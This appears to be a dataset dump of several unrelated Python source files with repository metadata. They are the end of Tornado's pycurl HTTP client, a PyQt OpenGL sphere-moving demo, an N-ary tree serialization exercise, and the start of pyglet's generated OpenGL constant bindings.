for k, v in request.headers.get_all()
],
)
curl.setopt(
pycurl.HEADERFUNCTION,
functools.partial(
self._curl_header_callback, headers, request.header_callback
),
)
if request.streaming_callback:
def write_function(b: Union[bytes, bytearray]) -> int:
assert request.streaming_callback is not None
self.io_loop.add_callback(request.streaming_callback, b)
return len(b)
else:
write_function = buffer.write
curl.setopt(pycurl.WRITEFUNCTION, write_function)
curl.setopt(pycurl.FOLLOWLOCATION, request.follow_redirects)
curl.setopt(pycurl.MAXREDIRS, request.max_redirects)
assert request.connect_timeout is not None
curl.setopt(pycurl.CONNECTTIMEOUT_MS, int(1000 * request.connect_timeout))
assert request.request_timeout is not None
curl.setopt(pycurl.TIMEOUT_MS, int(1000 * request.request_timeout))
if request.user_agent:
curl.setopt(pycurl.USERAGENT, native_str(request.user_agent))
else:
curl.setopt(pycurl.USERAGENT, "Mozilla/5.0 (compatible; pycurl)")
if request.network_interface:
curl.setopt(pycurl.INTERFACE, request.network_interface)
if request.decompress_response:
curl.setopt(pycurl.ENCODING, "gzip,deflate")
else:
curl.setopt(pycurl.ENCODING, "none")
if request.proxy_host and request.proxy_port:
curl.setopt(pycurl.PROXY, request.proxy_host)
curl.setopt(pycurl.PROXYPORT, request.proxy_port)
if request.proxy_username:
assert request.proxy_password is not None
credentials = httputil.encode_username_password(
request.proxy_username, request.proxy_password
)
curl.setopt(pycurl.PROXYUSERPWD, credentials)
if request.proxy_auth_mode is None or request.proxy_auth_mode == "basic":
curl.setopt(pycurl.PROXYAUTH, pycurl.HTTPAUTH_BASIC)
elif request.proxy_auth_mode == "digest":
curl.setopt(pycurl.PROXYAUTH, pycurl.HTTPAUTH_DIGEST)
else:
raise ValueError(
"Unsupported proxy_auth_mode %s" % request.proxy_auth_mode
)
else:
curl.setopt(pycurl.PROXY, "")
curl.unsetopt(pycurl.PROXYUSERPWD)
if request.validate_cert:
curl.setopt(pycurl.SSL_VERIFYPEER, 1)
curl.setopt(pycurl.SSL_VERIFYHOST, 2)
else:
curl.setopt(pycurl.SSL_VERIFYPEER, 0)
curl.setopt(pycurl.SSL_VERIFYHOST, 0)
if request.ca_certs is not None:
curl.setopt(pycurl.CAINFO, request.ca_certs)
else:
# There is no way to restore pycurl.CAINFO to its default value
# (Using unsetopt makes it reject all certificates).
# I don't see any way to read the default value from python so it
# can be restored later. We'll have to just leave CAINFO untouched
# if no ca_certs file was specified, and require that if any
# request uses a custom ca_certs file, they all must.
pass
if request.allow_ipv6 is False:
# Curl behaves reasonably when DNS resolution gives an ipv6 address
# that we can't reach, so allow ipv6 unless the user asks to disable.
curl.setopt(pycurl.IPRESOLVE, pycurl.IPRESOLVE_V4)
else:
curl.setopt(pycurl.IPRESOLVE, pycurl.IPRESOLVE_WHATEVER)
# Set the request method through curl's irritating interface which makes
# up names for almost every single method
curl_options = {
"GET": pycurl.HTTPGET,
"POST": pycurl.POST,
"PUT": pycurl.UPLOAD,
"HEAD": pycurl.NOBODY,
}
custom_methods = set(["DELETE", "OPTIONS", "PATCH"])
for o in curl_options.values():
curl.setopt(o, False)
if request.method in curl_options:
curl.unsetopt(pycurl.CUSTOMREQUEST)
curl.setopt(curl_options[request.method], True)
elif request.allow_nonstandard_methods or request.method in custom_methods:
curl.setopt(pycurl.CUSTOMREQUEST, request.method)
else:
raise KeyError("unknown method " + request.method)
body_expected = request.method in ("POST", "PATCH", "PUT")
body_present = request.body is not None
if not request.allow_nonstandard_methods:
# Some HTTP methods nearly always have bodies while others
# almost never do. Fail in this case unless the user has
# opted out of sanity checks with allow_nonstandard_methods.
if (body_expected and not body_present) or (
body_present and not body_expected
):
raise ValueError(
"Body must %sbe None for method %s (unless "
"allow_nonstandard_methods is true)"
% ("not " if body_expected else "", request.method)
)
if body_expected or body_present:
if request.method == "GET":
# Even with `allow_nonstandard_methods` we disallow
# GET with a body (because libcurl doesn't allow it
# unless we use CUSTOMREQUEST). While the spec doesn't
# forbid clients from sending a body, it arguably
# disallows the server from doing anything with them.
raise ValueError("Body must be None for GET request")
request_buffer = BytesIO(utf8(request.body or ""))
def ioctl(cmd: int) -> None:
if cmd == curl.IOCMD_RESTARTREAD:
request_buffer.seek(0)
curl.setopt(pycurl.READFUNCTION, request_buffer.read)
curl.setopt(pycurl.IOCTLFUNCTION, ioctl)
if request.method == "POST":
curl.setopt(pycurl.POSTFIELDSIZE, len(request.body or ""))
else:
curl.setopt(pycurl.UPLOAD, True)
curl.setopt(pycurl.INFILESIZE, len(request.body or ""))
if request.auth_username is not None:
assert request.auth_password is not None
if request.auth_mode is None or request.auth_mode == "basic":
curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)
elif request.auth_mode == "digest":
curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_DIGEST)
else:
raise ValueError("Unsupported auth_mode %s" % request.auth_mode)
userpwd = httputil.encode_username_password(
request.auth_username, request.auth_password
)
curl.setopt(pycurl.USERPWD, userpwd)
curl_log.debug(
"%s %s (username: %r)",
request.method,
request.url,
request.auth_username,
)
else:
curl.unsetopt(pycurl.USERPWD)
curl_log.debug("%s %s", request.method, request.url)
if request.client_cert is not None:
curl.setopt(pycurl.SSLCERT, request.client_cert)
if request.client_key is not None:
curl.setopt(pycurl.SSLKEY, request.client_key)
if request.ssl_options is not None:
raise ValueError("ssl_options not supported in curl_httpclient")
if threading.active_count() > 1:
# libcurl/pycurl is not thread-safe by default. When multiple threads
# are used, signals should be disabled. This has the side effect
# of disabling DNS timeouts in some environments (when libcurl is
# not linked against ares), so we don't do it when there is only one
# thread. Applications that use many short-lived threads may need
# to set NOSIGNAL manually in a prepare_curl_callback since
# there may not be any other threads running at the time we call
# threading.activeCount.
curl.setopt(pycurl.NOSIGNAL, 1)
if request.prepare_curl_callback is not None:
request.prepare_curl_callback(curl)
def _curl_header_callback(
self,
headers: httputil.HTTPHeaders,
header_callback: Callable[[str], None],
header_line_bytes: bytes,
) -> None:
header_line = native_str(header_line_bytes.decode("latin1"))
if header_callback is not None:
self.io_loop.add_callback(header_callback, header_line)
# header_line as returned by curl includes the end-of-line characters.
# whitespace at the start should be preserved to allow multi-line headers
header_line = header_line.rstrip()
if header_line.startswith("HTTP/"):
headers.clear()
try:
(__, __, reason) = httputil.parse_response_start_line(header_line)
header_line = "X-Http-Reason: %s" % reason
except httputil.HTTPInputError:
return
if not header_line:
return
headers.parse_line(header_line)
def _curl_debug(self, debug_type: int, debug_msg: str) -> None:
debug_types = ("I", "<", ">", "<", ">")
if debug_type == 0:
debug_msg = native_str(debug_msg)
curl_log.debug("%s", debug_msg.strip())
elif debug_type in (1, 2):
debug_msg = native_str(debug_msg)
for line in debug_msg.splitlines():
curl_log.debug("%s %s", debug_types[debug_type], line)
elif debug_type == 4:
curl_log.debug("%s %r", debug_types[debug_type], debug_msg)
class CurlError(HTTPError):
def __init__(self, errno: int, message: str) -> None:
HTTPError.__init__(self, 599, message)
self.errno = errno
if __name__ == "__main__":
AsyncHTTPClient.configure(CurlAsyncHTTPClient)
main()
| [
"[email protected]"
] | |
084706420a235cb05902a3d6090d79a5ce7dd498 | 3ce592352627591346ea33ea0c2665ad879414e2 | /References/opengl/computer.graphics.through.opengl/02_basic_drawing/moveSphere.py | eda2a48c42e3589ed85713e89d5a27c85fe955ba | [
"MIT"
] | permissive | royqh1979/python_libs_usage | 113df732ef106f4a5faae1343493756fd703c8c0 | 57546d5648d8a6b7aca7d7ff9481aa7cd4d8f511 | refs/heads/master | 2021-04-16T18:14:43.835482 | 2021-01-11T03:55:25 | 2021-01-11T03:55:25 | 249,374,754 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,672 | py | """
// moveSphere.py
//
// This program allows the user to move a sphere to demonstrate
// distortion at the edges of the viewing frustum.
//
// Interaction:
// Press the arrow keys to move the sphere.
// Press the space bar to rotate the sphere..
// Press r to reset.
//
"""
from PyQt5 import QtWidgets, QtCore, QtGui, QtOpenGL
from OpenGL.GL import *
import math as m
# Co-ordinates of the sphere center.
Xvalue = 0.0
Yvalue = 0.0
Angle = 0.0; # Angle to rotate the sphere.
def myWireSphere(r:float, nParal:int, nMerid:int):
j=0
while j<m.pi:
glBegin(GL_LINE_LOOP)
y=r*m.cos(j)
i=0
while i < 2*m.pi:
x=r*m.cos(i)*m.sin(j)
z=r*m.sin(i)*m.sin(j)
glVertex3f(x,y,z)
i += m.pi / 60
glEnd();
j += m.pi / (nParal + 1)
j=0
while j<m.pi:
glBegin(GL_LINE_LOOP)
i=0
while i < 2*m.pi:
x=r*m.sin(i)*m.cos(j)
y=r*m.cos(i)
z=r*m.sin(j)*m.sin(i)
glVertex3f(x,y,z)
i += m.pi / 60
glEnd();
j += m.pi / nMerid
class MyWidget(QtWidgets.QOpenGLWidget):
def __init__(self):
super().__init__()
self.setFixedSize(500,500)
def initializeGL(self) -> None:
glClearColor(1.0, 1.0, 1.0, 0.0)
def paintGL(self) -> None:
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
#Set the position of the sphere.
glTranslatef(Xvalue, Yvalue, -5.0)
glRotatef(Angle, 1.0, 1.0, 1.0)
glColor3f(0.0, 0.0, 0.0)
myWireSphere(0.5, 16, 10)
glFlush()
def resizeGL(self, w: int, h: int) -> None:
glViewport(0, 0, w, h)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glFrustum(-1.0, 1.0, -1.0, 1.0, 1.5, 20.0)
glMatrixMode(GL_MODELVIEW)
def keyPressEvent(self, event: QtGui.QKeyEvent) -> None:
global Xvalue,Yvalue,Angle
if event.key() == QtCore.Qt.Key_R:
Xvalue = Yvalue = Angle = 0.0
self.update()
elif event.key() == QtCore.Qt.Key_Space:
Angle += 10.0
self.update()
elif event.key() == QtCore.Qt.Key_Up:
Yvalue += 0.1
self.update()
elif event.key() == QtCore.Qt.Key_Down:
Yvalue -= 0.1
self.update()
elif event.key() == QtCore.Qt.Key_Left:
Xvalue -= 0.1
self.update()
elif event.key() == QtCore.Qt.Key_Right:
Xvalue += 0.1
self.update()
if __name__ == '__main__':
app = QtWidgets.QApplication([])
win = MyWidget()
win.show()
app.exec() | [
"[email protected]"
] | |
e0287539bd801f859c461d1ae1d70b8055288938 | 5759c0ed3219c06437ce5b39ef9ad92b5e191fed | /py/0428_serialize_and_deserialize_n_ary_tree.py | 1df779c0ca32628d1c3067e97cc5b065abbbda52 | [] | no_license | mengnan1994/Surrender-to-Reality | ba69df7c36112ad19f19157a9f368eae6340630f | 66232728ce49149188f863271ec2c57e426abb43 | refs/heads/master | 2022-02-25T01:34:49.526517 | 2019-09-22T17:21:28 | 2019-09-22T17:21:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,773 | py | """
Serialization is the process of converting a data structure or object into a sequence of bits so that it can be stored in a file or memory buffer,
or transmitted across a network connection link to be reconstructed later in the same or another computer environment.
Design an algorithm to serialize and deserialize an N-ary tree. An N-ary tree is a rooted tree in which each node has no more than N children.
There is no restriction on how your serialization/deserialization algorithm should work.
You just need to ensure that an N-ary tree can be serialized to a string and this string can be deserialized to the original tree structure.
For example, you may serialize the following 3-ary tree as [1 [3[5 6] 2 4]].
You do not necessarily need to follow this format, so please be creative and come up with different approaches yourself.
Note:
1. N is in the range of [1, 1000]
2. Do not use class member/global/static variables to store states. Your serialize and deserialize algorithms should be stateless.
"""
class Node(object):
def __init__(self, val, children):
self.val = val
self.children = children
class Codec(object):
def serialize(self, root):
serialization = str(self.inorder_helper(root))
print(serialization)
res = ""
for symbol in serialization:
if symbol != " " and symbol != ",":
res += symbol
return res
def inorder_helper(self, node):
if not node.children:
return [node.val, []]
return [node.val] + [self.inorder_helper(child) for child in node.children]
def deserialize(self, data):
if not data:
return None
scanner = 0
dummy_head = Node("dummy head", [])
stack = [dummy_head]
val_stack = ["#"]
root = None
while scanner < len(data):
# print(val_stack)
# print(data[scanner:])
# print("===")
if data[scanner] == '[':
# 如果遇到左括号,准备入栈
scanner += 1
if data[scanner] == ']':
scanner += 1
elif data[scanner] in ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']:
val = ""
while data[scanner] in ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']:
val += data[scanner]
scanner += 1
val = int(val)
node = Node(val, [])
stack[-1].children.append(node)
stack.append(node)
val_stack.append(node.val)
else:
root = stack.pop()
val_stack.pop()
scanner += 1
return root | [
"[email protected]"
] | |
3330ac47b8e263dc784e8adc5c51fdaaa3d8f3ed | 140929bb7a81dd76688d5acc923f28aa0ff539d8 | /env/lib/python3.6/site-packages/pyglet/gl/gl.py | 124e049934b4d7e17508d83139153ba74ef16da6 | [
"Apache-2.0"
] | permissive | boodahDEV/Soni-IA | bd4436895c6c61c191e8968a964667af174121cd | c452c0b3df3a3ced4b5027c2abb4f3c22fd0f948 | refs/heads/master | 2020-05-05T01:27:04.810504 | 2019-05-27T06:48:08 | 2019-05-27T06:48:08 | 179,603,282 | 2 | 1 | Apache-2.0 | 2019-05-27T06:38:43 | 2019-04-05T01:39:46 | Python | UTF-8 | Python | false | false | 134,082 | py | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Wrapper for /usr/include/GL/gl.h
Generated by tools/gengl.py.
Do not modify this file.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from ctypes import *
from pyglet.gl.lib import link_GL as _link_function
from pyglet.gl.lib import c_ptrdiff_t
# BEGIN GENERATED CONTENT (do not edit below this line)
# This content is generated by gengl.py.
# Wrapper for /usr/include/GL/gl.h
GL_VERSION_1_1 = 1 # /usr/include/GL/gl.h:140
GL_VERSION_1_2 = 1 # /usr/include/GL/gl.h:141
GL_VERSION_1_3 = 1 # /usr/include/GL/gl.h:142
GL_ARB_imaging = 1 # /usr/include/GL/gl.h:143
GLenum = c_uint # /usr/include/GL/gl.h:149
GLboolean = c_ubyte # /usr/include/GL/gl.h:150
GLbitfield = c_uint # /usr/include/GL/gl.h:151
GLvoid = None # /usr/include/GL/gl.h:152
GLbyte = c_char # /usr/include/GL/gl.h:153
GLshort = c_short # /usr/include/GL/gl.h:154
GLint = c_int # /usr/include/GL/gl.h:155
GLubyte = c_ubyte # /usr/include/GL/gl.h:156
GLushort = c_ushort # /usr/include/GL/gl.h:157
GLuint = c_uint # /usr/include/GL/gl.h:158
GLsizei = c_int # /usr/include/GL/gl.h:159
GLfloat = c_float # /usr/include/GL/gl.h:160
GLclampf = c_float # /usr/include/GL/gl.h:161
GLdouble = c_double # /usr/include/GL/gl.h:162
GLclampd = c_double # /usr/include/GL/gl.h:163
GL_FALSE = 0 # /usr/include/GL/gl.h:172
GL_TRUE = 1 # /usr/include/GL/gl.h:173
GL_BYTE = 5120 # /usr/include/GL/gl.h:176
GL_UNSIGNED_BYTE = 5121 # /usr/include/GL/gl.h:177
GL_SHORT = 5122 # /usr/include/GL/gl.h:178
GL_UNSIGNED_SHORT = 5123 # /usr/include/GL/gl.h:179
GL_INT = 5124 # /usr/include/GL/gl.h:180
GL_UNSIGNED_INT = 5125 # /usr/include/GL/gl.h:181
GL_FLOAT = 5126 # /usr/include/GL/gl.h:182
GL_2_BYTES = 5127 # /usr/include/GL/gl.h:183
GL_3_BYTES = 5128 # /usr/include/GL/gl.h:184
GL_4_BYTES = 5129 # /usr/include/GL/gl.h:185
GL_DOUBLE = 5130 # /usr/include/GL/gl.h:186
GL_POINTS = 0 # /usr/include/GL/gl.h:189
GL_LINES = 1 # /usr/include/GL/gl.h:190
GL_LINE_LOOP = 2 # /usr/include/GL/gl.h:191
GL_LINE_STRIP = 3 # /usr/include/GL/gl.h:192
GL_TRIANGLES = 4 # /usr/include/GL/gl.h:193
GL_TRIANGLE_STRIP = 5 # /usr/include/GL/gl.h:194
GL_TRIANGLE_FAN = 6 # /usr/include/GL/gl.h:195
GL_QUADS = 7 # /usr/include/GL/gl.h:196
GL_QUAD_STRIP = 8 # /usr/include/GL/gl.h:197
GL_POLYGON = 9 # /usr/include/GL/gl.h:198
GL_VERTEX_ARRAY = 32884 # /usr/include/GL/gl.h:201
GL_NORMAL_ARRAY = 32885 # /usr/include/GL/gl.h:202
GL_COLOR_ARRAY = 32886 # /usr/include/GL/gl.h:203
GL_INDEX_ARRAY = 32887 # /usr/include/GL/gl.h:204
GL_TEXTURE_COORD_ARRAY = 32888 # /usr/include/GL/gl.h:205
GL_EDGE_FLAG_ARRAY = 32889 # /usr/include/GL/gl.h:206
GL_VERTEX_ARRAY_SIZE = 32890 # /usr/include/GL/gl.h:207
GL_VERTEX_ARRAY_TYPE = 32891 # /usr/include/GL/gl.h:208
GL_VERTEX_ARRAY_STRIDE = 32892 # /usr/include/GL/gl.h:209
GL_NORMAL_ARRAY_TYPE = 32894 # /usr/include/GL/gl.h:210
GL_NORMAL_ARRAY_STRIDE = 32895 # /usr/include/GL/gl.h:211
GL_COLOR_ARRAY_SIZE = 32897 # /usr/include/GL/gl.h:212
GL_COLOR_ARRAY_TYPE = 32898 # /usr/include/GL/gl.h:213
GL_COLOR_ARRAY_STRIDE = 32899 # /usr/include/GL/gl.h:214
GL_INDEX_ARRAY_TYPE = 32901 # /usr/include/GL/gl.h:215
GL_INDEX_ARRAY_STRIDE = 32902 # /usr/include/GL/gl.h:216
GL_TEXTURE_COORD_ARRAY_SIZE = 32904 # /usr/include/GL/gl.h:217
GL_TEXTURE_COORD_ARRAY_TYPE = 32905 # /usr/include/GL/gl.h:218
GL_TEXTURE_COORD_ARRAY_STRIDE = 32906 # /usr/include/GL/gl.h:219
GL_EDGE_FLAG_ARRAY_STRIDE = 32908 # /usr/include/GL/gl.h:220
GL_VERTEX_ARRAY_POINTER = 32910 # /usr/include/GL/gl.h:221
GL_NORMAL_ARRAY_POINTER = 32911 # /usr/include/GL/gl.h:222
GL_COLOR_ARRAY_POINTER = 32912 # /usr/include/GL/gl.h:223
GL_INDEX_ARRAY_POINTER = 32913 # /usr/include/GL/gl.h:224
GL_TEXTURE_COORD_ARRAY_POINTER = 32914 # /usr/include/GL/gl.h:225
GL_EDGE_FLAG_ARRAY_POINTER = 32915 # /usr/include/GL/gl.h:226
GL_V2F = 10784 # /usr/include/GL/gl.h:227
GL_V3F = 10785 # /usr/include/GL/gl.h:228
GL_C4UB_V2F = 10786 # /usr/include/GL/gl.h:229
GL_C4UB_V3F = 10787 # /usr/include/GL/gl.h:230
GL_C3F_V3F = 10788 # /usr/include/GL/gl.h:231
GL_N3F_V3F = 10789 # /usr/include/GL/gl.h:232
GL_C4F_N3F_V3F = 10790 # /usr/include/GL/gl.h:233
GL_T2F_V3F = 10791 # /usr/include/GL/gl.h:234
GL_T4F_V4F = 10792 # /usr/include/GL/gl.h:235
GL_T2F_C4UB_V3F = 10793 # /usr/include/GL/gl.h:236
GL_T2F_C3F_V3F = 10794 # /usr/include/GL/gl.h:237
GL_T2F_N3F_V3F = 10795 # /usr/include/GL/gl.h:238
GL_T2F_C4F_N3F_V3F = 10796 # /usr/include/GL/gl.h:239
GL_T4F_C4F_N3F_V4F = 10797 # /usr/include/GL/gl.h:240
GL_MATRIX_MODE = 2976 # /usr/include/GL/gl.h:243
GL_MODELVIEW = 5888 # /usr/include/GL/gl.h:244
GL_PROJECTION = 5889 # /usr/include/GL/gl.h:245
GL_TEXTURE = 5890 # /usr/include/GL/gl.h:246
GL_POINT_SMOOTH = 2832 # /usr/include/GL/gl.h:249
GL_POINT_SIZE = 2833 # /usr/include/GL/gl.h:250
GL_POINT_SIZE_GRANULARITY = 2835 # /usr/include/GL/gl.h:251
GL_POINT_SIZE_RANGE = 2834 # /usr/include/GL/gl.h:252
GL_LINE_SMOOTH = 2848 # /usr/include/GL/gl.h:255
GL_LINE_STIPPLE = 2852 # /usr/include/GL/gl.h:256
GL_LINE_STIPPLE_PATTERN = 2853 # /usr/include/GL/gl.h:257
GL_LINE_STIPPLE_REPEAT = 2854 # /usr/include/GL/gl.h:258
GL_LINE_WIDTH = 2849 # /usr/include/GL/gl.h:259
GL_LINE_WIDTH_GRANULARITY = 2851 # /usr/include/GL/gl.h:260
GL_LINE_WIDTH_RANGE = 2850 # /usr/include/GL/gl.h:261
GL_POINT = 6912 # /usr/include/GL/gl.h:264
GL_LINE = 6913 # /usr/include/GL/gl.h:265
GL_FILL = 6914 # /usr/include/GL/gl.h:266
GL_CW = 2304 # /usr/include/GL/gl.h:267
GL_CCW = 2305 # /usr/include/GL/gl.h:268
GL_FRONT = 1028 # /usr/include/GL/gl.h:269
GL_BACK = 1029 # /usr/include/GL/gl.h:270
GL_POLYGON_MODE = 2880 # /usr/include/GL/gl.h:271
GL_POLYGON_SMOOTH = 2881 # /usr/include/GL/gl.h:272
GL_POLYGON_STIPPLE = 2882 # /usr/include/GL/gl.h:273
GL_EDGE_FLAG = 2883 # /usr/include/GL/gl.h:274
GL_CULL_FACE = 2884 # /usr/include/GL/gl.h:275
GL_CULL_FACE_MODE = 2885 # /usr/include/GL/gl.h:276
GL_FRONT_FACE = 2886 # /usr/include/GL/gl.h:277
GL_POLYGON_OFFSET_FACTOR = 32824 # /usr/include/GL/gl.h:278
GL_POLYGON_OFFSET_UNITS = 10752 # /usr/include/GL/gl.h:279
GL_POLYGON_OFFSET_POINT = 10753 # /usr/include/GL/gl.h:280
GL_POLYGON_OFFSET_LINE = 10754 # /usr/include/GL/gl.h:281
GL_POLYGON_OFFSET_FILL = 32823 # /usr/include/GL/gl.h:282
GL_COMPILE = 4864 # /usr/include/GL/gl.h:285
GL_COMPILE_AND_EXECUTE = 4865 # /usr/include/GL/gl.h:286
GL_LIST_BASE = 2866 # /usr/include/GL/gl.h:287
GL_LIST_INDEX = 2867 # /usr/include/GL/gl.h:288
GL_LIST_MODE = 2864 # /usr/include/GL/gl.h:289
GL_NEVER = 512 # /usr/include/GL/gl.h:292
GL_LESS = 513 # /usr/include/GL/gl.h:293
GL_EQUAL = 514 # /usr/include/GL/gl.h:294
GL_LEQUAL = 515 # /usr/include/GL/gl.h:295
GL_GREATER = 516 # /usr/include/GL/gl.h:296
GL_NOTEQUAL = 517 # /usr/include/GL/gl.h:297
GL_GEQUAL = 518 # /usr/include/GL/gl.h:298
GL_ALWAYS = 519 # /usr/include/GL/gl.h:299
GL_DEPTH_TEST = 2929 # /usr/include/GL/gl.h:300
GL_DEPTH_BITS = 3414 # /usr/include/GL/gl.h:301
GL_DEPTH_CLEAR_VALUE = 2931 # /usr/include/GL/gl.h:302
GL_DEPTH_FUNC = 2932 # /usr/include/GL/gl.h:303
GL_DEPTH_RANGE = 2928 # /usr/include/GL/gl.h:304
GL_DEPTH_WRITEMASK = 2930 # /usr/include/GL/gl.h:305
GL_DEPTH_COMPONENT = 6402 # /usr/include/GL/gl.h:306
GL_LIGHTING = 2896 # /usr/include/GL/gl.h:309
GL_LIGHT0 = 16384 # /usr/include/GL/gl.h:310
GL_LIGHT1 = 16385 # /usr/include/GL/gl.h:311
GL_LIGHT2 = 16386 # /usr/include/GL/gl.h:312
GL_LIGHT3 = 16387 # /usr/include/GL/gl.h:313
GL_LIGHT4 = 16388 # /usr/include/GL/gl.h:314
GL_LIGHT5 = 16389 # /usr/include/GL/gl.h:315
GL_LIGHT6 = 16390 # /usr/include/GL/gl.h:316
GL_LIGHT7 = 16391 # /usr/include/GL/gl.h:317
GL_SPOT_EXPONENT = 4613 # /usr/include/GL/gl.h:318
GL_SPOT_CUTOFF = 4614 # /usr/include/GL/gl.h:319
GL_CONSTANT_ATTENUATION = 4615 # /usr/include/GL/gl.h:320
GL_LINEAR_ATTENUATION = 4616 # /usr/include/GL/gl.h:321
GL_QUADRATIC_ATTENUATION = 4617 # /usr/include/GL/gl.h:322
GL_AMBIENT = 4608 # /usr/include/GL/gl.h:323
GL_DIFFUSE = 4609 # /usr/include/GL/gl.h:324
GL_SPECULAR = 4610 # /usr/include/GL/gl.h:325
GL_SHININESS = 5633 # /usr/include/GL/gl.h:326
GL_EMISSION = 5632 # /usr/include/GL/gl.h:327
GL_POSITION = 4611 # /usr/include/GL/gl.h:328
GL_SPOT_DIRECTION = 4612 # /usr/include/GL/gl.h:329
GL_AMBIENT_AND_DIFFUSE = 5634 # /usr/include/GL/gl.h:330
GL_COLOR_INDEXES = 5635 # /usr/include/GL/gl.h:331
GL_LIGHT_MODEL_TWO_SIDE = 2898 # /usr/include/GL/gl.h:332
GL_LIGHT_MODEL_LOCAL_VIEWER = 2897 # /usr/include/GL/gl.h:333
GL_LIGHT_MODEL_AMBIENT = 2899 # /usr/include/GL/gl.h:334
GL_FRONT_AND_BACK = 1032 # /usr/include/GL/gl.h:335
GL_SHADE_MODEL = 2900 # /usr/include/GL/gl.h:336
GL_FLAT = 7424 # /usr/include/GL/gl.h:337
GL_SMOOTH = 7425 # /usr/include/GL/gl.h:338
GL_COLOR_MATERIAL = 2903 # /usr/include/GL/gl.h:339
GL_COLOR_MATERIAL_FACE = 2901 # /usr/include/GL/gl.h:340
GL_COLOR_MATERIAL_PARAMETER = 2902 # /usr/include/GL/gl.h:341
GL_NORMALIZE = 2977 # /usr/include/GL/gl.h:342
GL_CLIP_PLANE0 = 12288 # /usr/include/GL/gl.h:345
GL_CLIP_PLANE1 = 12289 # /usr/include/GL/gl.h:346
GL_CLIP_PLANE2 = 12290 # /usr/include/GL/gl.h:347
GL_CLIP_PLANE3 = 12291 # /usr/include/GL/gl.h:348
GL_CLIP_PLANE4 = 12292 # /usr/include/GL/gl.h:349
GL_CLIP_PLANE5 = 12293 # /usr/include/GL/gl.h:350
GL_ACCUM_RED_BITS = 3416 # /usr/include/GL/gl.h:353
GL_ACCUM_GREEN_BITS = 3417 # /usr/include/GL/gl.h:354
GL_ACCUM_BLUE_BITS = 3418 # /usr/include/GL/gl.h:355
GL_ACCUM_ALPHA_BITS = 3419 # /usr/include/GL/gl.h:356
GL_ACCUM_CLEAR_VALUE = 2944 # /usr/include/GL/gl.h:357
GL_ACCUM = 256 # /usr/include/GL/gl.h:358
GL_ADD = 260 # /usr/include/GL/gl.h:359
GL_LOAD = 257 # /usr/include/GL/gl.h:360
GL_MULT = 259 # /usr/include/GL/gl.h:361
GL_RETURN = 258 # /usr/include/GL/gl.h:362
GL_ALPHA_TEST = 3008 # /usr/include/GL/gl.h:365
GL_ALPHA_TEST_REF = 3010 # /usr/include/GL/gl.h:366
GL_ALPHA_TEST_FUNC = 3009 # /usr/include/GL/gl.h:367
GL_BLEND = 3042 # /usr/include/GL/gl.h:370
GL_BLEND_SRC = 3041 # /usr/include/GL/gl.h:371
GL_BLEND_DST = 3040 # /usr/include/GL/gl.h:372
GL_ZERO = 0 # /usr/include/GL/gl.h:373
GL_ONE = 1 # /usr/include/GL/gl.h:374
GL_SRC_COLOR = 768 # /usr/include/GL/gl.h:375
GL_ONE_MINUS_SRC_COLOR = 769 # /usr/include/GL/gl.h:376
GL_SRC_ALPHA = 770 # /usr/include/GL/gl.h:377
GL_ONE_MINUS_SRC_ALPHA = 771 # /usr/include/GL/gl.h:378
GL_DST_ALPHA = 772 # /usr/include/GL/gl.h:379
GL_ONE_MINUS_DST_ALPHA = 773 # /usr/include/GL/gl.h:380
GL_DST_COLOR = 774 # /usr/include/GL/gl.h:381
GL_ONE_MINUS_DST_COLOR = 775 # /usr/include/GL/gl.h:382
GL_SRC_ALPHA_SATURATE = 776 # /usr/include/GL/gl.h:383
GL_FEEDBACK = 7169 # /usr/include/GL/gl.h:386
GL_RENDER = 7168 # /usr/include/GL/gl.h:387
GL_SELECT = 7170 # /usr/include/GL/gl.h:388
GL_2D = 1536 # /usr/include/GL/gl.h:391
GL_3D = 1537 # /usr/include/GL/gl.h:392
GL_3D_COLOR = 1538 # /usr/include/GL/gl.h:393
GL_3D_COLOR_TEXTURE = 1539 # /usr/include/GL/gl.h:394
GL_4D_COLOR_TEXTURE = 1540 # /usr/include/GL/gl.h:395
GL_POINT_TOKEN = 1793 # /usr/include/GL/gl.h:396
GL_LINE_TOKEN = 1794 # /usr/include/GL/gl.h:397
GL_LINE_RESET_TOKEN = 1799 # /usr/include/GL/gl.h:398
GL_POLYGON_TOKEN = 1795 # /usr/include/GL/gl.h:399
GL_BITMAP_TOKEN = 1796 # /usr/include/GL/gl.h:400
